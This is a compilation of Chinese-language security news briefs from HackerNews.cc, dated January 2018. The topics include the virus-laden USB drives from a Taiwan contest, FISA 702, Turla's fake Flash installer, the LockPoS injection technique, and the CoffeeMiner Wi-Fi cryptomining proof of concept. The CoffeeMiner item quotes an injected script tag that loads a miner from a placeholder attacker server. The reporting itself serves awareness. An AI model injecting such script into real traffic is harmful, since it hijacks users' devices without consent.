台湾数据安全竞赛意外发布“病毒 U 盘”

据外媒报道,刑事调查局 ( CIB ) 向通过网络安全知识测试的公众奖励了 250 个 U 盘,随后该主办方陆续接到报告称“累计 54 个8GB U 盘中都带有恶意软件”,该测试是去年 12 月 11 日至 15 日期间由台湾总统办公室主办的信息安全活动的一部分。 知情人士表示,一些通过测试的参赛者报告说,U 盘被其设备上的安全软件标记为含有恶意软件之前,U 盘的分发就已于 12 月 12 日停止了。目前 20 个单位已经退回该驱动器,其余的可能还在流通。 该恶意软件被标记为 XtbSeDuA.exe ,能够从 32 位计算机中窃取个人信息。根据 CIB 的说法,若是数据窃取成功该恶意软件会试图将数据传递到一个位于波兰的 IP 地址,随后该 IP 地址将数据转发给身份不明的服务器。研究人员透露该恶意程序被认为是欧洲刑警组织在 2015 年发现的网络诈骗团伙使用的。 CIB 表示,这种感染来源于当地承包商员工所使用的 “ 将操作系统转移到驱动器并测试其存储容量 ” 的工作站,其中有些驱动器是在中国大陆生产的。但警方并不认为这一起间谍活动 ,仅以“意外安全事件”作为处置。 事实上此类安全事件的发生并不在少数,例如 2008 年,澳大利亚电信公司 Telstra 在 AusCERT 安全会议上无意发布了恶意软件。此外,早在 2002 年,IBM 的 U 盘也被发现包含一种罕见的引导扇区病毒。而且去年,该公司又发生了一起涉及闪存驱动器的事故, 该公司将携带木马病毒的 U 盘与其存储系统存储在一起。 2016 年的一项调查发现,当人们遇到有问题的 U 盘时,好奇心往往会驱使他们一探究竟。在这项研究中,300 名大学生中有近一半的人没有回避插入和点击记忆卡中的文件。此外,研究 认为 U 盘的另一个问题是其经常会被误放,正如两年前在伦敦西部发现了一个包含伦敦希思罗机场敏感信息的未加密 U 盘。 Stuxnet 蠕虫病毒(超级工厂病毒)就是潜伏于 U 盘上并且造成严重破坏的重要例子: Stuxnet 蠕虫病毒于 2008 年在伊朗纳坦兹核设施造成重大的离心机损坏,据说它是通过一个 U 盘被引进到该设施的;2013 年,美国有两家未命名的发电厂被含有恶意 U 盘的软件感染;2016 年,德国核电厂使用的电脑和 18 个U 盘也被发现存在恶意软件。 消息来源:welivesecurity,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

美众议院同意涉外情报监控法修正案,或将增强 NSA 间谍能力

据外媒报道,美国众议院 11 日以 256 票对 164 票的结果同意《涉外情报监控法修正案》(FISA Amendments Act)第 702 条 的更新授权,延长其有效期至 2024 年。不过该修正案还需美国参议院进行表决,但若表决通过将会意味着美国国家安全局(NSA)能够继续在没有搜查令的情况下监听美国境外的外籍人士,并且收集与外国人员通信的美国公民的相关情报。目前该修正案因缺乏对被监控人群的隐私保护而受到美国某些团体的反对。 自 2001 年 “ 9·11 ” 恐怖袭击事件发生之后,美国政府就开始在收集情报信息方面加大力度。据悉,NSA 存储于数据库的情报是在 AT&T、谷歌、Facebook 以及雅虎等互联网公司的帮助下编制的,而这些公司在未经授权的情况下就将信息交给了美国官员。 然而外国情报监控法的第 702 条将在 1 月 19 日到期,若在该日期前法案仍未获得美国政府通过,那么该条例将不能再保证 NSA 的监听计划。 虽然目前该修正案还需获得参议院的表决,但有政治分析人士猜测该修正案应该会被通过。最重要的一点是,美国总统唐纳德·特朗普(Tonald Trump)今天在 Twitter 上表示支持该修正案。 但也有不少美国隐私团体和公众反对该修正案,他们认为其增强了 NSA 的间谍权力,以至于隐私受到侵犯。 消息来源: Bleeping Computer,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

黑客组织“奇幻熊”曝光国际奥委会涉药邮件,揭露俄运动员被禁赛黑幕

据媒体报道,黑客组织 “ 奇幻熊 ” 于 1 月 10 日曝光了世界反兴奋剂机构(WADA)与国际奥委会(IOC)官员之间关于俄罗斯运动员涉药问题的电子邮件,其目的可能是为了报复 WADA 擅自公开俄运动员服用禁药名单的行为。 目前多家网络安全公司认为 “ 奇幻熊 ” 可能与俄罗斯情报部门 GRU 存在某种关系。 在该邮件中,IOC 法律部前主任 霍华德·斯塔普质疑 WADA 未与国际奥委会沟通就擅自发布俄运动员服用禁药的报告, 旨在阻止俄罗斯运动员参加奥运会。WADA 的行为引发了俄罗斯方面强烈的不满,俄方认为 WADA 是在美国的指令下扼杀俄罗斯体育。根据俄国家杜马议员斯维绍夫的说法, WADA 总部位于加拿大,该机构几乎所有领导人都与美国情报部门有着某种联系,而 WADA 近年来对俄罗斯体育的攻击足以证实 “奇幻熊” 泄露的消息的真实性。 目前多家网络安全公司对 “ 奇幻熊 ” 的泄露行为和俄运动员禁赛事件进行了分析,他们认为“ 奇幻熊 ” 可能与俄罗斯情报部门 GRU 有关系。一家名为 ThreatConnect 的安全公司表示该泄露事件是俄罗斯对奥运禁令实施的报复行为。 不过奇怪的是,WADA 倒是对 “奇幻熊 ” 的爆料极为镇定。WADA 公关专员杜兰德表示,“ 奇幻熊 ”一直竭力破坏 WADA 及其相关工作, 他们 10日 公布的邮件信息都是过时的 。 而目前 IOC 则拒绝对此事件发表评论。 内容整理:新浪新闻、IBTimes,编辑:榆榆,校审:FOX;

首款采用 Kotlin 语言编写的恶意应用程序实现短信欺诈

外媒 1 月 9 日消息,趋势科技近期于 Google Play 商店发现了首款使用 Kotlin 语言编写的恶意应用程序 Swift Cleaner。据研究人员介绍,该恶意软件被描述成用于清理和优化 Android 设备的工具,但实际上该软件能够执行远程命令、窃取信息、短信发送、URL 转发和点击欺诈。最重要的一点是,在未经许可的情况下自动为用户订阅收费短信服务。截至研究人员发现时,该恶意应用程序 下载安装数量已达 5000 次。 图1. Swift Cleaner,伪装成 Android 清洁应用程序的恶意应用程序 Google 于 2017 年 5 月称 Kotlin 是编写 Android 应用程序的一流语言。自 Kotlin 发布以来,17% 的 Android Studio 项目开始使用其编程,例如 Twitter,Pinterest 和 Netflix 都是使用 Kotlin 开发的应用程序。Kotlin 非常简洁,极大程度的减少了样板代码的数量,并且非常安全。 图2. 使用 Kotlin 开发的恶意应用程序的封装结构 恶意软件工作原理 启动 Swift Cleaner 后,恶意软件会将用户的设备信息发送到其远程服务器,并启动后台服务以从其远程 C&C 服务器获取攻击任务。当设备第一次被感染时,恶意软件会将短信发送到 C&C 服务器提供的指定号码。 图3.恶意应用程序通过短信收集并发送受害者的设备信息 恶意软件收到 SMS 命令后,远程服务器将执行 URL 转发并点击广告欺诈。 在其点击欺诈例程中,恶意软件会收到执行无线应用协议(WAP)任务的远程命令。 在此之后,将注入恶意的 Javascript 代码替换正则表达式。据悉,这是一系列定义搜索模式的字符,允许恶意行为者在特定的搜索字符串中解析广告的 HTML 代码。随后,恶意软件会秘密打开设备的移动数据,解析图像 base64 代码,破解 CAPTCHA ,并将完成的任务发送至远程服务器。 图4.恶意应用程序上传将用于订阅高级短信订阅服务的令牌 此外,恶意软件还可以将用户服务提供商的信息以及登录信息和验证码图片上传到 C&C 服务器。一旦上传,C&C 服务器就会自动处理用户的高级短息服务服务订阅,从而进行流量欺诈。 目前趋势科技称其已向 Google 披露了该恶意软件, Google Play Protect 也设置了保护措施来避免用户收到侵害。 更多详细内容可查看 Trend Micro 分析报告原文: <First Kotlin-Developed Malicious App Signs Users Up for Premium SMS Services> 消息来源:TrendmMicro,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

PoS 端恶意软件 LockPoS 携手新型代码注入技术,通过内存窃取信用卡数据

外媒 1 月 10 日消息, 以色列网络安全公司 Cyberbit 发现 PoS 端恶意软件 LockPoS 利用新型代码注入技术窃取信用卡数据。据研究人员介绍, 一旦系统受到感染 , LockPoS 将试图获得访问权限以读取当前使用进程的内存,从而开始搜集信用卡数据并将其发送到命令和控制服务器中。 Cyberbit 的研究人员观察到 LockPoS 使用的新技术与僵尸网络 Flokibot 之前使用的注入技术在源码上多有相似之处。但值得注意的是,LockPoS 使用了不同的技术和例程来解压缩和解密,以便于调用与 Flokibot 相关的 API 。 据悉,LockPoS 使用了三个主要的例程(routines),用于将代码注入到远程进程中:NtCreateSection,NtMapViewOfSection 和 NtCreateThreadEx。而这三个例程均从 ntdll.dll 中导出。研究人员表示, LockPoS 利用的新技术涉及使用 NtCreateSection 在内核中创建一个节对象 ,然后调用 NtMapViewOfSection 将该节的视图映射至另一个进程,之后再将代码复制到该节中并创建一个远程线程来执行映射的代码。但研究人员称 LockPoS 并不会直接从 ntdll 调用例程来注入代码,而是将磁盘上的 ntdll 例程映射到虚拟地址空间。 这样一来,LockPoS 会保留一个干净的 dll 副本,并且可以避免反病毒检测。 目前来说,由于 Windows 10 内核功能无法被监控,改进内存分析可能是唯一有效的检测方法。 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

大量比特币钱包暴露,开发商 Electrum 紧急修复 JSONRPC 接口漏洞

外媒 1 月 10 日消息,知名钱包开发商 Electrum 近期针对其比特币钱包的 JSONRPC 接口漏洞发布了安全补丁。 据悉,该漏洞允许托管 Electrum 钱包的恶意网站通过 Web 浏览器窃取用户的加密货币,研究人员猜测这可能与 JSONRPC 接口中的密码暴露有关。此外,攻击者还可以利用该漏洞获得私人数据,例如比特币地址、交易标签、地址标签、钱包联系人等信息。目前该漏洞影响了几乎所有平台上的 Electrum 2.6 – 3.0.4 版本。 研究人员介绍了该漏洞的具体细节:当 Electrum 后台程序运行时,在 web 服务器上不同虚拟主机的攻击者可以通过本地的 RPC 端口轻易地访问 electrum 钱包。此外,该漏洞还允许攻击者在运行 Electrum 时修改用户设置。 相关媒体报道称该漏洞早在两年前就已经存在,Electrum 之前也发布过针对该漏洞的安全补丁,不过当时并未起到作用。研究人员建议用户应升级其 Electrum 软件,并停止使用旧版本。 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

修复 WPA2 高危漏洞,WPA3 WiFi 标准即将到来

外媒 1 月 9 日消息,Wi-Fi 联盟于近期计划发布 WPA2 的增强功能,其中涉及身份验证、加密和配置等问题。此外,该联盟也在本周一宣布推出一个名为 WPA3 的新安全协议( 作为 WPA2 的后续产品 )。据悉,Wi-Fi 联盟认为 WPA3 协议的推出将使 Wi-Fi 安全性得到显著改善。 Wi-Fi 联盟计划在今年上半年推出 WPA2 的三项增强功能,用于其产品组合的配置、身份验证和加密增强等方面。以往的 WPA2 协议易受 KRACK 和 DEAUTH 攻击,所以 Wi-Fi 联盟希望能够通过改进关键技术来解决这些问题。 另外,计划推出的 WPA3 新安全协议将以 WPA2 的核心组件为基础,进一步保护确保Wi-Fi网络的安全。 WPA3 将具有以下功能: 第一个功能是在多次失败的登录尝试之后,通过屏蔽 WiFi 身份验证过程来防止暴力攻击。 第二种是将附近支持 wifi 的设备作为其他设备的配置面板。 第三和第四项功能与 WiFi WPA3 中包含的加密功能有关,第三个是 “ 个性化数据加密 ” ,这是一项加密设备与路由器或接入点之间连接的功能。第四种是改进的加密标准,WiFi 联盟将其描述为 “一个 192 位安全套件,与国家安全系统委员会的商业国家安全算法( CNSA )套装一致,该套件将进一步保护政府、国防和工业等更高安全要求的 Wi-Fi 网络。” 除了这些通用的描述外,更多的细节预计将在 2018 年晚些时候公布。 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。  

俄间谍组织 Turla 利用捆绑后门的 Flash 安装程序针对东欧各国使馆展开攻击活动

ESET 安全团队发现由国家资助的俄罗斯网络间谍组织 Turla 为其网络军械库增添了一款新“武器”,旨在针对 东欧各国使领馆开展攻击活动。据研究人员介绍说,Turla 将其后门与合法的 Flash Player 安装程序捆绑在一起,试图欺骗目标用户安装恶意软件,以便窃取敏感信息。 Turla 组织长期以来一直使用社交工程来引诱目标人群下载和安装伪造的 Adobe Flash Player。但 ESET 近期研究发现,该组织并未局限于以往的攻击工具 ,而是继续开发新型网络攻击武器。 据 ESET 透露 Turla 组织现在不仅将其后门与合法的 Flash Player 安装程序捆绑在一起,而且进一步融合更多可行方式,以确保所使用的 URL 和 IP 地址与 Adobe 的合法基础结构相对应。这样一来,攻击者基本上能够利用 Adobe 诱使用户下载恶意软件,并且使用户相信其下载的软件是来自 Adobe 官方网站(adobe.com)的。 自 2016 年 7 月以来该新工具的攻击活动中有几个与 Turla 组织有关的特征,其中包括该组织创建的后门程序 “ 蚊子”(Mosquito),以及之前与该组织关联使用的IP地址。 除了上述相关特征之外,新工具与 Turla 组织传播的其他恶意软件家族也有相似之处。 攻击媒介 ESET 研究人员提出了几个假设(如下图所示),是关于 Turla 的恶意软件如何应用到用户的计算机上。下图按照图标依次为:① 本地中间人攻击、② 危及网关 、③ ISP 更改流量、④ BGP 劫持、⑤ Adobe 某种威胁,其中 ⑤ 的假想被认为是不太可能成立的。 经过假设以及验证,ESET 研究人员考虑的可能的攻击媒介是: — 受害者组织网络内的一台机器可能被劫持,以便它可以作为本地中间人(MitM)攻击的跳板,这将有效地将目标机器的流量重定向到本地网络上的受感染机器上。 — 攻击者还可能危及组织的网关,使其能够拦截该组织的内部网和互联网之间的所有传入和传出流量。 — 流量拦截也可能发生在互联网服务提供商( ISP )的层面上 。 — 攻击者可能使用边界网关协议(BGP)劫持来将流量重新路由到 Turla 控制的服务器,虽然这种策略可能会相当迅速地启动 Adobe 或 BGP 监视服务的警报。 一旦成功安装并启动假 Flash 程序,前面所使用的几个后门则可能被丢弃,如后门 Mosquito ,它是一个 Win32 恶意软件,通过恶意 JavaScript 文件与 Google Apps 脚本上托管的 Web 应用程序通信,或者是从伪造的和不存在的 Adobe URL 下载的未知文件。 然后,这个阶段将被设定为任务的主要目标——过滤敏感数据,包括受感染计算机的唯一 ID、用户名以及安装在设备上的安全产品列表。而用户名和设备名称则会由 Turla 所使用的后门从在 MacOS 上过滤出来。 在这个过程的最后一部分,伪造的安装程序会丢弃随后运行合法的 Flash Player 应用程序以便迷惑用户。后者的安装程序要么嵌入到其伪造的对象中,要么从 Google Drive 网址下载。为了在系统上建立持久性,恶意安装程序还会篡改操作系统的注册表,创建一个允许远程访问的管理帐户。 目前,ESET 的研究人员称已经发现了 Turla 后门 Mosquito 的新样本,不过其代码分析更加困难。 相关阅读: <Turla’s watering hole campaign: An updated Firefox extension abusing Instagram> <Carbon Paper: Peering into Turla’s second stage backdoor> 消息来源:welivesecurity,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

AMD 彻底躺枪:微软 KB4056892 补丁或导致系统变砖

据外媒 1 月 8 日报道, 微软为 Meltdown 、 Spectre 发布的安全更新 Windows KB4056892 对一些 AMD 设备的系统(尤其老款 AMD Athlon 64)产生了负面影响。相关用户向微软上反馈了该影响的具体细节,不过目前尚无确切调查情况以及官方回应。 近期被披露的 Meltdown ( 熔断 ) 和 Spectre(幽灵 )漏洞给用户和芯片供应商带来很多问题,值得注意的是,AMD 的 cpu 不容易受到 Meltdown 漏洞的影响,但可能会受到 Spectre 的攻击。目前像苹果、思科和微软这些科技巨头承认了其产品问题,并相继推出安全补丁。 然而相关安全专家认为这些修复补丁可能将会对设备的性能产生重大影响。不过这些说法遭到英特尔方面的否认,英特尔证实经过苹果、亚马逊、谷歌和微软的广泛测试,评估了安全更新不会对系统性能产生负面影响。 个别用户声称 Windows 的安全更新 KB4056892 压制使用 AMD (尤其是 Athlon)驱动的电脑,致使系统无法启动,只显示没有动画的 Windows 图标。经过几次失败的启动后执行回滚,还是显示错误 0x800f0845。补丁安装完成后,Athlon 驱动的系统停止工作,但重点是修复程序并没有创建恢复点,以至于甚至在某些情况下都不能恢复回滚。 还有有些用户报告说,即使重新安装 Windows 10 也不能解决问题。 针对这一情况,受影响的用户将需要禁用 Windows Update,但 AMD 用户的尴尬局面最终还是只有微软才能解决。不过微软尚未对该页面上的用户反馈作出任何回应。 后续更新 昨日在微软论坛大量 AMD 用户报告无法进入系统之后,微软正式确认补丁存在兼容性问题,已紧急撤回。 微软官方在支持页面称,他们拿到的用于堵漏 Meltdown 和 Spectre 的 AMD 芯片组技术文件和实际情况不符。目前,微软已经停止了 9 个补丁向 AMD 平台的分发工作(主要是 Win10 的 KB4056892 和 Win7 的 KB4056894 ),正和 AMD 一道联手解决。(cnBeta 消息) 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

新型 CoffeeMiner 攻击:劫持公共 Wi-Fi 用户设备秘密挖掘门罗币

据外媒 1 月 6 日报道,开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目,展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。 加密货币的价格上涨使其一直受到网络攻击者的青睐。不久前,黑客就瞄准了星巴克里 “ 蹭网 ” 的笔记本,将其变成了自己的矿机疯狂挖掘门罗币(与比特币类似的一种加密货币)。 Arnau 专家受到了星巴克案件的启发,破解公共 Wi-Fi 网络,将加密挖掘代码注入到连接的浏览会话中,迫使连入 公共 Wi-Fi 网络的所有设备秘密挖掘加密货币。 Arnau 解释了如何在连接的用户访问的 html 页面中为 MITM (中间人)攻击注入一些 javascript ,这样做所有连接到 WiFi 网络的设备都可以强制成为 Arnau 的加密货币。 Arnau 专家分享 CoffeeMiner 攻击方式: 通过欺骗局域网上的地址解析协议(ARP)消息拦截网络上其他设备的未加密传输。 使用 Mitmproxy 将 JavaScript 注入到 Wi-Fi 用户访问的页面中。 为了保证过程简洁,开发人员只注入了一行调用加密货币矿工的代码。 <script src="http://httpserverIP:8000/script.js" type="text/javascript"></script> 然后,通过一个 HTTP 服务器服务该挖掘器。当用户的浏览器加载带有注入代码的页面时,运行 JavaScript 滥用 CPU 时间,并使用 CoinHive 加密挖掘软件挖掘 Monero 。 一旦编译完成,这些元素就会成为一个单独的脚本,可以由攻击者在公共 Wi-Fi 网络上部署。不知情的用户通过由攻击者控制的服务器重新路由,导致其设备在浏览时挖掘加密货币。 目前研究人员发布的 CoffeeMiner 版本尚不支持 HTTPS,但是可以通过添加 sslstrip 来绕过限制。 相关阅读: 研究人员发布的 CoffeeMiner 攻击演示视频  Arnau 在GitHub上发布的 CoffeeMiner 项目代码 消息来源:Security Affairs、Zdnet,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。